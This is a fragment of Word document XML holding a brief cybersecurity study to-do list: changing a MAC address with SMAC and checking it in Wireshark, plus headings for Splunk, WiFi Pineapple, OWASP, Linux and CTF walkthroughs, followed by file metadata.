    <w:p w14:paraId="000006DD" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006DE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006DF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006E0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>TO DO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006E1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">1. Change MAC using SMAC - Open browser, browse few websites, turn on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wireshark</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and capture the traffic. Now analyse the MAC address of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ur</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> computer from any one packet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006E2" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006E3" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006E4" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>SPLUNK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006E5" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>90 DAYS TRIAL PERIOD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006E6" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006E7" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>WIFI PINEAPPLE | SPLUNK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006E8" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006E9" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006EA" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006EB" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">NETWORKING | SERVER | LINUX </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006EC" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006ED" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">OWASP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006EE" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006EF" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00000000">
      <w:r>
        <w:t>CTF WALKTHROUGHS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000006F0" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:p w14:paraId="000006F1" w14:textId="77777777" w:rsidR="00923DCA" w:rsidRDefault="00923DCA"/>
    <w:sectPr w:rsidR="00923DC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DCA"/>
    <w:rsid w:val="00536D92"/>
    <w:rsid w:val="005433E6"/>
    <w:rsid w:val="00923D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A2D8C1-FB50-42EF-AD15-44F0D4E4D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6247</Words>
  <Characters>35612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Harihara suthan</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-09-26T03:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-09-26T04:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>